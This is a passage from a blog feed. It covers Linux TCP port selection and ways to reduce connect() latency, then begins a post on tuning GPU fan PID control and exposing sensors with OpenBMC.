      <h3>One IPv4 address</h3>
      <a href="#one-ipv4-address">
        
      </a>
    </div>
    
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6kpueuXS3SbBTIig306IDN/b27ab899656fbfc0bf3c885a44fb04a4/image8.png" />
            
            </figure><p>In this case, the bimodal distribution is even more pronounced. Over half of the total connections are in the slow case rather than the fast! We may conclude that simply switching to one IPv4 address for cache egress is going to introduce significant latency on our connect() syscalls.</p><p>The next logical step is to figure out where this bottleneck is happening.</p>
    <div>
      <h2>Port selection is not what you think it is</h2>
      <a href="#port-selection-is-not-what-you-think-it-is">
        
      </a>
    </div>
    <p>To investigate this, we first took a flame graph of a production machine:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1tFwadYDdC5UVK78j4yKsv/64aca09189acba5bf3dab2e043265e0f/image7.png" />
            
            </figure><p>Flame graphs depict the run-time function call stack of a system. The y-axis depicts call-stack depth, and the x-axis depicts each function as a horizontal bar whose width represents the number of times the function was sampled. Check out this in-depth <a href="https://www.brendangregg.com/flamegraphs.html">guide</a> about flame graphs for more details.</p><p>Most of the samples are taken in the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L1000"><code>__inet_hash_connect()</code></a>. We can see that there are also many samples for <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L544"><code>__inet_check_established()</code></a> with some lock contention sampled between. We have a better picture of a potential bottleneck, but we do not have a consistent test to compare against.</p><p>Wrk introduces a bit more variability than we would like to see. Still focusing on the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/tcp_ipv4.c#L201"><code>tcp_v4_connect()</code></a>, we performed another synthetic test with a homegrown benchmark tool to test one IPv4 address. A tool such as <a href="https://github.com/ColinIanKing/stress-ng">stress-ng</a> may also be used, but some modification is necessary to implement the socket option <a href="https://man7.org/linux/man-pages/man7/ip.7.html"><code>IP_LOCAL_PORT_RANGE</code></a>. There is more about that socket option later.</p><p>We are now going to ensure a deterministic number of connections, and remove lock contention from the problem. The result is something like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5d6tJum5BBe3jsLRqhXtFN/7952fb3d0a3da761de158fae4f925eb5/Screenshot-2024-02-07-at-15.54.29.png" />
            
            </figure><p>On the y-axis we measured the latency between the start and end of a connect() syscall. The x-axis denotes when a connect() was called. Green dots are even-numbered ports, and red dots are odd-numbered ports. The orange line is a linear regression on the data.</p><p>The disparity in average port allocation time between even and odd ports provides us with a major clue. Connections with odd ports are established significantly more slowly than those with even ports. Further, odd ports are not interleaved with earlier connections. This implies we exhaust our even ports before attempting the odd. The chart also confirms our bimodal distribution.</p>
    <div>
      <h3>__inet_hash_connect()</h3>
      <a href="#__inet_hash_connect">
        
      </a>
    </div>
    <p>At this point we wanted to understand this split a bit better. We know from the flame graph and the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L1000"><code>__inet_hash_connect()</code></a> that this holds the algorithm for port selection. For context, this function is responsible for associating the socket to a source port in a late bind. If a port was previously provided with bind(), the algorithm just tests for a unique TCP 4-tuple (src ip, src port, dest ip, dest port) and ignores port selection.</p><p>Before we dive in, there is a little bit of setup work that happens first. Linux first generates a time-based hash that is used as the basis for the starting port, then adds randomization, and then puts that information into an offset variable. This is always set to an even integer.</p><p><a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L1043">net/ipv4/inet_hashtables.c</a></p>
            <pre><code>   offset &amp;= ~1U;
    
other_parity_scan:
    port = low + offset;
    for (i = 0; i &lt; remaining; i += 2, port += 2) {
        if (unlikely(port &gt;= high))
            port -= remaining;

        inet_bind_bucket_for_each(tb, &amp;head-&gt;chain) {
            if (inet_bind_bucket_match(tb, net, port, l3mdev)) {
                if (!check_established(death_row, sk, port, &amp;tw))
                    goto ok;
                goto next_port;
            }
        }
    }

    offset++;
    if ((offset &amp; 1) &amp;&amp; remaining &gt; 1)
        goto other_parity_scan;</code></pre>
            <p>In a nutshell: for each connection, loop through one half of the ports in our range (all even or all odd) before looping through the other half (all odd or all even, respectively). Specifically, this is a variation of the <a href="https://datatracker.ietf.org/doc/html/rfc6056#section-3.3.4">Double-Hash Port Selection Algorithm</a>. We will ignore the bind bucket functionality since that is not our main concern.</p><p>Depending on your port range, you either start with an even port or an odd port. In our case, our low port, 9024, is even. Then the port is picked by adding the offset to the low port:</p><p><a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L1045">net/ipv4/inet_hashtables.c</a></p>
            <pre><code>port = low + offset;</code></pre>
            <p>If low was odd, we will have an odd starting port because odd + even = odd.</p><p>There is a bit too much going on in the loop to explain in text. I have an example instead:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6uVqtAUR07epRRKqQbHWkp/2a5671b1dd3c68c012e7171b8103a53e/image5.png" />
            
            </figure><p>This example is bound by 8 ports and 8 possible connections. All ports start unused. As a port is used up, the port is grayed out. Green boxes represent the next chosen port. All other colors represent open ports. Blue arrows are even port iterations of offset, and red are the odd port iterations of offset. Note that the offset is randomly picked, and once we cross over to the odd range, the offset is incremented by one.</p><p>For each selection of a port, the algorithm then makes a call to the function <code>check_established()</code> which dereferences <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/inet_hashtables.c#L544"><code>__inet_check_established()</code></a>. This function loops over sockets to verify that the TCP 4-tuple is unique. The takeaway is that the socket list traversed by this function is usually short, but it grows as more unique TCP 4-tuples are introduced to the system, and longer socket lists eventually slow down port selection. We have a blog post on <a href="/how-to-stop-running-out-of-ephemeral-ports-and-start-to-love-long-lived-connections/">ephemeral port exhaustion</a> that dives into the socket list and port uniqueness criteria.</p><p>At this point, we can summarize that the odd/even port split is what is causing our performance bottleneck. And during the investigation, it was not obvious to me (or even maybe you) why the offset was initially calculated the way it was, and why the odd/even port split was introduced. After some git archaeology, the decisions become clearer.</p>
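<p>To make the scan above easier to play with, here is a compact Python model of it (our own simplification of <code>__inet_hash_connect()</code>; bind buckets, hashing, and locking are omitted):</p>

```python
def select_port(low, high, offset, used):
    """Toy model of the kernel's parity scan: try every other port starting
    at low + (offset & ~1), wrapping at `high`, then repeat with the other
    parity. Returns the first free port, or None if the range is exhausted."""
    remaining = (high - low + 1) & ~1  # kept even so wraparound preserves parity
    offset &= ~1                       # the even offsets are scanned first
    for _half in range(2):
        port = low + offset
        for _ in range(0, remaining, 2):
            if port > high:
                port -= remaining
            if port not in used:
                return port
            port += 2
        offset += 1                    # then the odd offsets
    return None

# With ports 0-7 and all even ports taken, the scan falls through to the
# odd half, just like in the diagram above.
print(select_port(0, 7, 4, {0, 2, 4, 6}))  # 5
```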
    <div>
      <h3>Security considerations</h3>
      <a href="#security-considerations">
        
      </a>
    </div>
    <p>Port selection has been shown to be used in device <a href="https://lwn.net/Articles/910435/">fingerprinting</a> in the past. This led the authors to introduce more randomization into the initial port selection. Previously, ports were picked predictably, based solely on their initial hash and a salt value that does not change often. This helps explain the offset, but does not explain the split.</p>
    <div>
      <h3>Why the even/odd split?</h3>
      <a href="#why-the-even-odd-split">
        
      </a>
    </div>
    <p>Prior to this <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=07f4c90062f8fc7c8c26f8f95324cbe8fa3145a5">patch</a> and that <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1580ab63fc9a03593072cc5656167a75c4f1d173">patch</a>, services could have conflicts between connect()-heavy and bind()-heavy workloads. Thus, to avoid those conflicts, the split was added. An even offset was chosen for the connect() workloads, and an odd offset for the bind() workloads. However, the split only works well for connect() workloads that do not exceed one half of the allotted port range.</p><p>Now we have an explanation for the flame graph and charts. So what can we do about this?</p>
    <div>
      <h2>User space solution (kernel &lt; 6.8)</h2>
      <a href="#user-space-solution-kernel-6-8">
        
      </a>
    </div>
    <p>We have a couple of strategies that would work best for us. Infrastructure or architectural strategies are not considered due to the significant development effort required. Instead, we prefer to tackle the problem where it occurs.</p><h3>Select, test, repeat</h3><p>For the “select, test, repeat” approach, you may have code that ends up looking like this:</p>
            <pre><code>sys = get_ip_local_port_range()
ports_available = sys.hi - sys.lo + 1
estab = 0

while estab &lt; ports_available:
    random_port = random.randint(sys.lo, sys.hi)
    connection = attempt_connect(random_port)
    if connection is None:
        continue  # port conflict: pick another port and retry

    estab += 1</code></pre>
            <p>The algorithm simply loops through the system port range, randomly picks a port each iteration, and then tests that the connect() worked. If not, rinse and repeat until range exhaustion.</p><p>This approach is good for up to ~70-80% port range utilization, but may take roughly eight to twelve attempts per connection as we approach exhaustion. The major downside to this approach is the extra syscall overhead on conflict. In order to reduce this overhead, we can consider another approach that still allows the kernel to select the port for us.</p><h3>Select port by random shifting range</h3><p>This approach leverages the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=91d0b78c5177f3e42a4d8738af8ac19c3a90d002"><code>IP_LOCAL_PORT_RANGE</code></a> socket option, and we were able to achieve performance like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/Uz8whp12VuvqvKTDnE1u9/4701177d739bdffe2a2399213cf72941/Screenshot-2024-02-07-at-16.00.22.png" />
            
            </figure><p>That is much better! The chart also introduces black dots that represent errored connections. However, they have a tendency to clump at the very end of our port range as we approach exhaustion. This is not dissimilar to what we may see in “<a href="#selecttestrepeat">select, test, repeat</a>”.</p><p>The way this solution works is something like:</p>
            <pre><code>IP_BIND_ADDRESS_NO_PORT = 24
IP_LOCAL_PORT_RANGE = 51
sys = get_local_port_range()
window.lo = 0
window.hi = 1000
range = window.hi - window.lo
offset = randint(sys.lo, sys.hi - range)
window.lo = offset
window.hi = offset + range

sk = socket(AF_INET, SOCK_STREAM)
sk.setsockopt(IPPROTO_IP, IP_BIND_ADDRESS_NO_PORT, 1)
range = pack("@I", window.lo | (window.hi &lt;&lt; 16))
sk.setsockopt(IPPROTO_IP, IP_LOCAL_PORT_RANGE, range)
sk.bind((src_ip, 0))
sk.connect((dest_ip, dest_port))</code></pre>
            <p>We first fetch the system's local port range, define a custom port range, and then randomly shift the custom range within the system range. Introducing this randomization helps the kernel start port selection randomly at an odd or even port, and reduces the loop search space down to the range of the custom window.</p><p>We tested with a few different window sizes, and determined that a window of five hundred or one thousand ports works fairly well for our port range:</p>
<table>
<thead>
  <tr>
    <th><span>Window size</span></th>
    <th><span>Errors</span></th>
    <th><span>Total test time</span></th>
    <th><span>Connections/second</span></th>
  </tr>
</thead>
<tbody>
  <tr>
    <td><span>500</span></td>
    <td><span>868</span></td>
    <td><span>~1.8 seconds</span></td>
    <td><span>~30,139</span></td>
  </tr>
  <tr>
    <td><span>1,000</span></td>
    <td><span>1,129</span></td>
    <td><span>~2 seconds</span></td>
    <td><span>~27,260</span></td>
  </tr>
  <tr>
    <td><span>5,000</span></td>
    <td><span>4,037</span></td>
    <td><span>~6.7 seconds</span></td>
    <td><span>~8,405</span></td>
  </tr>
  <tr>
    <td><span>10,000</span></td>
    <td><span>6,695</span></td>
    <td><span>~17.7 seconds</span></td>
    <td><span>~3,183</span></td>
  </tr>
</tbody>
</table><p>As the window size increases, the error rate increases. That is because a larger window provides less opportunity for a random offset. A max window size of 56,512 is no different from using the kernel’s default behavior. Therefore, a smaller window size works better. But you do not want it to be too small either. A window size of one is no different from “<a href="#selecttestrepeat">select, test, repeat</a>”.</p><p>In kernels &gt;= 6.8, we can do even better.</p><h2>Kernel solution (kernel &gt;= 6.8)</h2><p>A new <a href="https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net-next.git/commit/?id=207184853dbd">patch</a> was introduced that eliminates the need for the window shifting; it will be available in the 6.8 kernel.</p><p>Instead of picking a random window offset for <code>setsockopt(IPPROTO_IP, IP_LOCAL_PORT_RANGE</code>, …), as in the previous solution, we just pass the full system port range to activate the solution. The code may look something like this:</p>
            <pre><code>IP_BIND_ADDRESS_NO_PORT = 24
IP_LOCAL_PORT_RANGE = 51
sys = get_local_port_range()
sk = socket(AF_INET, SOCK_STREAM)
sk.setsockopt(IPPROTO_IP, IP_BIND_ADDRESS_NO_PORT, 1)
range = pack("@I", sys.lo | (sys.hi &lt;&lt; 16))
sk.setsockopt(IPPROTO_IP, IP_LOCAL_PORT_RANGE, range)
sk.bind((src_ip, 0))
sk.connect((dest_ip, dest_port))</code></pre>
            <p>Setting the <a href="https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=91d0b78c5177f3e42a4d8738af8ac19c3a90d002"><code>IP_LOCAL_PORT_RANGE</code></a> option tells the kernel to use an approach similar to “<a href="#random">select port by random shifting range</a>”: the start offset is randomized to be even or odd, but the search then loops incrementally rather than skipping every other port. We end up with results like this:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1ttWStZgNYfwftr71r8Vrt/7c333411ef01b674cc839f27ae4cbbbf/Screenshot-2024-02-07-at-16.04.24.png" />
            
            </figure><p>The performance of this approach is quite comparable to our user space implementation, albeit a little faster. That is due in part to general improvements, and to the fact that the algorithm can always find a port given the full search space of the range, so no cycles are wasted on a potentially filled sub-range.</p><p>These results are great for TCP, but what about other protocols?</p>
    <div>
      <h2>Other protocols &amp; connect()</h2>
      <a href="#other-protocols-connect">
        
      </a>
    </div>
    <p>It is worth mentioning at this point that the algorithms used for these protocols are <i>mostly</i> the same for IPv4 &amp; IPv6. Typically, the key differences are how the sockets are compared to determine uniqueness and where the port search happens. We did not compare performance for all protocols, but it is worth mentioning some similarities and differences between TCP and a couple of others.</p>
    <div>
      <h3>DCCP</h3>
      <a href="#dccp">
        
      </a>
    </div>
    <p>The DCCP protocol leverages the same port selection <a href="https://elixir.bootlin.com/linux/v6.6/source/net/dccp/ipv4.c#L115">algorithm</a> as TCP. Therefore, this protocol benefits from the recent kernel changes. It is also possible the protocol could benefit from our user space solution, but that is untested. We will let the reader exercise DCCP use-cases.</p>
    <div>
      <h3>UDP &amp; UDP-Lite</h3>
      <a href="#udp-udp-lite">
        
      </a>
    </div>
    <p><a href="https://www.cloudflare.com/learning/ddos/glossary/user-datagram-protocol-udp/">UDP</a> leverages a different algorithm, found in the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/udp.c#L239"><code>udp_lib_get_port()</code></a>. Similar to TCP, the algorithm loops over the whole port range incrementally, but only if a port was not already supplied in the bind() call. The key difference from TCP is that a random number is generated as a step variable. Once a first candidate port is identified, the algorithm keeps stepping from that port by the random number, relying on a uint16_t overflow to eventually loop back to the chosen port. If all ports are in use, the port is incremented by one and the process repeats. There is no splitting between even and odd ports.</p><p>The best comparison to the TCP measurements is a UDP setup similar to:</p>
            <pre><code>sk = socket(AF_INET, SOCK_DGRAM)
sk.bind((src_ip, 0))
sk.connect((dest_ip, dest_port))</code></pre>
            <p>And the results should be unsurprising with one IPv4 source address:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4UM5d0RBTgqADgVLbbqMlQ/940306c90767ba4b5e3762c6467b71ed/Screenshot-2024-02-07-at-16.06.27.png" />
            
            </figure><p>UDP fundamentally behaves differently from TCP, and there is less work overall for port lookups. The outliers in the chart represent a worst-case scenario in which we hit a particularly bad random number collision. In that case, we need to loop over more of the ephemeral range to find a port.</p><p>UDP has another problem. Given the socket option <code>SO_REUSEADDR</code>, the port you get back may conflict with another UDP socket. This is in part because the function <a href="https://elixir.bootlin.com/linux/v6.6/source/net/ipv4/udp.c#L141"><code>udp_lib_lport_inuse()</code></a> skips the UDP 2-tuple (src ip, src port) check when that option is set. When this happens, a new socket may overwrite a previous one, so extra care is needed. We wrote more in depth about these cases in a previous <a href="/how-to-stop-running-out-of-ephemeral-ports-and-start-to-love-long-lived-connections/">blog post</a>.</p>
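            <p>To make that behavior concrete, here is a loose Python model of the search described above (illustrative only, not the kernel code; the default port range, the function name, and the final linear scan modeling the “increment and repeat” fallback are our assumptions):</p>

```python
import random

def udp_pick_port(in_use, lo=32768, hi=60999):
    """Loose model of UDP's port search: random start, random odd step,
    uint16_t wraparound, then a linear fallback scan."""
    span = hi - lo + 1
    rand = random.getrandbits(16)
    offset = rand % span  # first candidate port, as an offset into the range
    step = rand | 1       # random step variable, kept odd
    for _ in range(span):
        port = lo + offset
        if port not in in_use:
            return port
        # step with uint16_t overflow, folded back into the range
        offset = ((offset + step) & 0xFFFF) % span
    # the random walk may revisit ports; scan the range incrementally as a fallback
    for port in range(lo, hi + 1):
        if port not in in_use:
            return port
    return None  # entire range exhausted
```

            <p>With an empty <code>in_use</code> set this returns some port in the range immediately; as the range fills up, the fallback scan still finds any remaining free port.</p>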
    <div>
      <h2>In summary</h2>
      <a href="#in-summary">
        
      </a>
    </div>
    <p>Cloudflare can make a lot of unicast egress connections to origin servers with popular uncached assets. To avoid port-resource exhaustion, we balance the load over a couple of IPv4 source addresses during those peak times. That led us to ask: “what is the performance impact of using one IPv4 source address for our connect()-heavy workloads?”. Port selection is not only difficult to get right, but is also a performance bottleneck, as evidenced by measuring connect() latency with a flame graph and synthetic workloads. That in turn led us to discover TCP’s quirky port selection process, which loops over one half of your ephemeral ports before the other on each connect().</p><p>We then proposed three solutions to the problem, short of adding more IP addresses or making other architectural changes: “<a href="#selecttestrepeat">select, test, repeat</a>”, “<a href="#random">select port by random shifting range</a>”, and an <a href="https://man7.org/linux/man-pages/man7/ip.7.html"><code>IP_LOCAL_PORT_RANGE</code></a> socket option <a href="#kernel">solution</a> in newer kernels. And finally, we closed out with honorable mentions of other protocols and their quirks.</p><p>Do not just take our numbers: please explore and measure your own systems. With a better understanding of your workloads, you can make a good decision on which strategy works best for your needs. Even better if you come up with your own strategy!</p> ]]></content:encoded>
            <category><![CDATA[Linux]]></category>
            <category><![CDATA[Protocols]]></category>
            <category><![CDATA[Performance]]></category>
            <category><![CDATA[Deep Dive]]></category>
            <category><![CDATA[IPv4]]></category>
            <category><![CDATA[IPv6]]></category>
            <category><![CDATA[Network]]></category>
            <guid isPermaLink="false">1C6z0btasEsz1cmdmoug0m</guid>
            <dc:creator>Frederick Lawler</dc:creator>
        </item>
        <item>
            <title><![CDATA[How we used OpenBMC to support AI inference on GPUs around the world]]></title>
            <link>https://blog.cloudflare.com/how-we-used-openbmc-to-support-ai-inference-on-gpus-around-the-world/</link>
            <pubDate>Wed, 06 Dec 2023 14:00:34 GMT</pubDate>
            <description><![CDATA[ This is what Cloudflare has been able to do so far with OpenBMC with respect to our GPU-equipped servers ]]></description>
            <content:encoded><![CDATA[ 
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3JeLifbB3Vdk6jqpeUpVRc/1647ed581b63f4f196194655e8c286d1/2148-HERO.png" />
            
            </figure><p>Cloudflare recently announced <a href="/workers-ai/">Workers AI</a>, giving developers the ability to run serverless GPU-powered AI inference on Cloudflare’s global network. One key area of focus in enabling this across our network was updating our Baseboard Management Controllers (BMCs). The BMC is an embedded microprocessor that sits on most servers and is responsible for remote power management, sensors, serial console, and other features such as virtual media.</p><p>To efficiently manage our BMCs, Cloudflare leverages OpenBMC, an open-source firmware stack from the Open Compute Project (OCP). For Cloudflare, OpenBMC provides transparent, auditable firmware. What follows describes some of what Cloudflare has been able to do so far with OpenBMC on our GPU-equipped servers.</p>
    <div>
      <h2>Ouch! That’s HOT!</h2>
      <a href="#ouch-thats-hot">
        
      </a>
    </div>
    <p>For this project, we needed a way to adjust our BMC firmware to accommodate new GPUs, while maintaining operational efficiency with respect to thermals and power consumption. OpenBMC was a powerful tool in meeting this objective.</p><p>OpenBMC allows us to change the hardware of our existing servers without depending on our Original Design Manufacturers (ODMs), consequently allowing our product teams to get started on products quickly. To physically support this effort, our servers need to be able to supply enough power and keep the GPU and the rest of the chassis within operating temperatures. Our servers had power supplies with sufficient power for the new GPUs as well as the rest of the chassis, so we were primarily concerned with ensuring they had sufficient cooling.</p><p>With OpenBMC, our first approach to enabling our product teams to start working with the GPUs was to simply blast fans directly in line with the GPU, assuming the GPU was running at Thermal Design Power (TDP, the maximum heat a component is expected to generate). Unfortunately, because of the heat given off by these new GPUs, we could not keep them below 95˚C when they were fully stressed. This prompted us to install another fan to help keep the GPU cool, which brought a fully stressed GPU down to 65˚C. This served as our baseline before we began the process of fine-tuning the fan Proportional-Integral-Derivative (PID) controller to handle variation in temperature in a more nuanced manner. Below is a graph of the baseline described above:</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/1r06acJOE7ZIuVP4jrCnqz/543e4e015d4a7de22f35800a9b4a80f4/2148-1.png" />
            
            </figure><p>With this baseline in place, tuning becomes a tedious iteration of PID constants. For those unfamiliar with PID controllers, we use the following equation to describe the control output given the error as input.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5Ooby3NUPSj7MFRmkYpesl/8d63ee010e49d6f350a76b23d50862dc/Screenshot-2023-12-05-at-15.31.01.png" />
            
            </figure><p>To break this down, u(t) represents our control output, e(t) is the error signal, and Kp, Ki, and Kd are the proportional gain, integral gain, and derivative gain constants, respectively. To briefly describe how each of these components works, I will isolate them one at a time. Our error, e(t), is simply the difference between the current temperature and the target temperature, so if our target temperature is 50 ˚C and our current temperature is 60 ˚C, the e(t) for the proportional component is 10 ˚C. If u(t) = Kp⋅e(t), we can see that u(t) = Kp⋅10. Any given Kp can drastically affect the control output u(t) and is responsible for how quickly the controller approaches the target. The Ki⋅∫e(t)dt term accumulates the error over time. The scenario where the controller reaches steady state but does not hit the target setpoint is called steady-state error. The integral component, by accumulating that error, is intended to resolve this scenario, but it can also cause oscillations if the integral gain is too large. Lastly, the derivative portion, Kd⋅∂e(t)/∂t, can be seen as Kd⋅(the slope of the error at the given point in time): the more quickly the controller approaches the target, the greater the slope; the slower the approach, the smaller the slope. Put another way, faster oscillations produce a greater derivative contribution, and slower oscillations a lesser one.</p><p>With this in mind, the following points are taken into consideration when we manually tune the controller:</p><ol><li><p>Avoid oscillations at the target setpoint, i.e. avoid letting the temperature fluctuate above or below the specified temperature. Oscillations, specifically variations in fan speed and pulse-width modulation (generally, the power supplied to the fan), increase mechanical wear on components. We want these servers to last their entire five-year lifecycle while not costing us capital expenses for replacing components or operating expenses in terms of the electricity we expend.</p></li><li><p>Approach the target setpoint as quickly as possible. In the graph above, we see the temperature settle somewhere between 63 ˚C and 65 ˚C quickly, but that is because the fans are at 100% load. Settling at the target setpoint quickly means our fans are able to quickly adjust to the heat expended by the GPU or any other component.</p></li><li><p>The proportional gain affects how quickly the controller approaches the setpoint.</p></li><li><p>The integral gain is used to remove steady-state error.</p></li><li><p>The derivative gain is based on the rate of change and is used to dampen oscillations.</p></li></ol><p>With a better understanding of PID controller theory, we can see how to iterate toward our final product. Our initial trial at full fan load had some difficulty finding the setpoint, as shown by the oscillations on the left side of the graph below. As we learned above, adjusting our integral and derivative gains helped reduce the oscillations. We can see the controller trying to lock in around 70 ˚C, but our intended target was 65 ˚C (if it were to lock in at 70 ˚C, this would be a clear example of steady-state error). The last point we worked to resolve was the speed at which the controller approaches the setpoint, which we were able to tune by adjusting the proportional gain.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/MX23CfxcUPHg4l72ITUVn/2961f3ef72cd07e21d780e90af5436a6/2148-3.png" />
            
            </figure><p>OpenBMC fan configurations are plain JSON files, which makes manually tuning PID settings straightforward. The graphs presented come from comma-separated value (CSV) files generated by OpenBMC’s PID controller application, and they allow us to easily iterate on and improve our configuration. Several iterations later, we got our final product. We had a tad bit of overshoot in the beginning, but this is a strong enough result for us to leave the PID controller here for now.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/5n47tnZ8vZqTD2fQsIX33W/44690423f9ce2053ea99a875065cfc7c/2148-4.png" />
            
            </figure>
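            <p>Before moving on, the control law above can be sketched in a few lines of code (a minimal discrete PID step for illustration, not OpenBMC’s implementation; the gains, timestep, and sign convention are our assumptions):</p>

```python
def pid_step(target, current, state, kp, ki, kd, dt):
    """One discrete PID update: returns the control output u(t)."""
    error = current - target                          # e(t): positive when too hot
    state["integral"] += error * dt                   # Ki term accumulates error over time
    derivative = (error - state["prev_error"]) / dt   # Kd term reacts to the error's slope
    state["prev_error"] = error
    return kp * error + ki * state["integral"] + kd * derivative

# Example: target 65 C, current 75 C, with arbitrary gains
state = {"integral": 0.0, "prev_error": 0.0}
u = pid_step(65.0, 75.0, state, kp=1.0, ki=0.1, kd=0.01, dt=1.0)  # u == 11.1
```

            <p>Calling this in a loop against the measured temperature, and mapping the output to a fan PWM duty cycle, is the essence of what the tuned controller does.</p>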
    <div>
      <h2>Talk to me GPU</h2>
      <a href="#talk-to-me-gpu">
        
      </a>
    </div>
    <p>In order to source the temperature data for the PID tuning above, we had to establish communication with the GPU. The first thing we did was identify the route from the BMC to the GPU and Peripheral Component Interconnect Express (PCIe) slot. Looking at our ODM’s schematics for the BMC and motherboard, we found a System Management Bus (SMBus) line to a mux or switch connecting to the PCIe slot. For embedded developers out there, the SMBus protocol is similar to the Inter-Integrated Circuit (I2C) bus protocol, with minor differences in electrical and clock speed requirements. With a physical path to communication established, we next needed to communicate with the GPU in software.</p><p>OpenBMC applications, Linux kernel drivers, and the software tools we can add for development make the configuration and operation of devices such as fans, analog-to-digital converters (ADC), and power supplies as simple as possible. The first thing we try as a test is to get some temperature sensor data from the GPU’s onboard temperature sensor and inventory information from the Electrically-Erasable Programmable Read-Only Memory (EEPROM). We can verify the temperature sensor data with tooling provided by our GPU vendor, and the inventory information can be verified against the asset sheet provided to us when the device was delivered. Building the <code>eeprog</code> tool, we can try communicating with the EEPROM:</p>
            <pre><code>~$ eeprog -f -16 /dev/i2c-23 0x50 -r 0x00:200
eeprog 0.7.5, a 24Cxx EEPROM reader/writer
Copyright (c) 2003 by Stefano Barbato - All rights reserved.
  Bus: /dev/i2c-23, Address: 0x50, Mode: 16bit
  Reading 200 bytes from 0x0
&lt;redacted&gt; Ver 0.02</code></pre>
            <p>This tool will produce block read requests over SMBus and dump the returned information. For temperature, the TMP75 is commonly used as a temperature sensor in commodity server components. We can manually bind the temperature sensor driver in sysfs like this:</p><p><code>~$ echo "tmp75 0x4F" &gt; /sys/bus/i2c/devices/i2c-23/new_device</code></p><p>This binds the tmp75 driver to address 0x4F on I2C bus 23, and we can verify the successful binding via sysfs as seen below:</p><p><code>~$ cat /sys/bus/i2c/devices/i2c-23/23-004f/name
tmp75</code></p><p>With our temperature sensor and inventory information, we can now leverage OpenBMC’s applications for simple configuration to make this information available via the Intelligent Platform Management Interface (IPMI) or Redfish, a REST-based protocol for communicating with the BMC. For adding these components, we will focus on Entity-Manager.</p><p>Entity-Manager is OpenBMC’s means of making physical components available to the BMC’s software via JSON configuration files. OpenBMC applications refer to information made available in these configurations to publish sensor and inventory data over BMC interfaces and to raise alerts when values go out of bounds of critically configured settings. The following is the configuration we use as a result of our discoveries above:</p>
            <pre><code>{
    "Exposes": [
        {
            "Address": "0x4F",
            "Bus": "23",
            "Name": "GPU_TEMP",
            "Thresholds": [
                {
                    "Direction": "greater than",
                    "Name": "upper critical",
                    "Severity": 1,
                    "Value": 92
                },
                {
                    "Direction": "less than",
                    "Name": "lower non critical",
                    "Severity": 0,
                    "Value": 30
                }
            ],
            "Type": "TMP75"
        }
    ],
    "Name": "****************",
    "Probe": "xyz.openbmc_project.FruDevice({'BOARD_PRODUCT_NAME': *********})",
    "Type": "NVMe",
    "xyz.openbmc_project.Inventory.Decorator.Asset": {
        "Manufacturer": "$BOARD_MANUFACTURER",
        "Model": "$BOARD_PRODUCT_NAME",
        "PartNumber": "$BOARD_PART_NUMBER",
        "SerialNumber": "$BOARD_SERIAL_NUMBER"
    }
}</code></pre>
            <p>Entity-Manager probes the I2C buses, reading the EEPROMs for inventory information that details what is available on each bus. It then tries to match that information against a given JSON configuration’s “Probe” member, and if there is a match, it applies the configuration and exposes the components it describes. The end result is the FRU and GPU_TEMP available over IPMI.</p>
            <pre><code>$~ ipmi 517m206 sdr |grep GPU_TEMP
GPU_TEMP         | 39 degrees C      | ok
$~ ipmi 517m206 fru print 151
FRU Device Description : &lt;redacted&gt; (ID 151)
 Board Mfg Date        : Mon Mar 27 18:13:00 2023 UTC
 Board Mfg             : &lt;redacted&gt;
 Board Product         : &lt;redacted&gt;
 Board Serial          : &lt;redacted&gt;
 Board Part Number     : &lt;redacted&gt;</code></pre>
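            <p>Once exposed, a Redfish client can pull the same reading from the standard Thermal resource. Here is a hedged sketch of the client side (the payload shape follows the Redfish Thermal schema, and the sensor name matches the configuration above; actual endpoint paths vary by platform, and this is not OpenBMC code):</p>

```python
import json

def gpu_temp(thermal_json, name="GPU_TEMP"):
    """Extract one temperature reading from a Redfish Thermal resource payload."""
    payload = json.loads(thermal_json)
    for sensor in payload.get("Temperatures", []):
        if sensor.get("Name") == name:
            return sensor.get("ReadingCelsius")
    return None  # sensor not present in this payload

# Example payload, trimmed to only the fields we use
sample = '{"Temperatures": [{"Name": "GPU_TEMP", "ReadingCelsius": 39}]}'
print(gpu_temp(sample))  # 39
```

            <p>The same reading is what IPMI reports above; Redfish simply wraps it in a typed JSON resource.</p>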
            
    <div>
      <h2>Open-Source firmware moving forward</h2>
      <a href="#open-source-firmware-moving-forward">
        
      </a>
    </div>
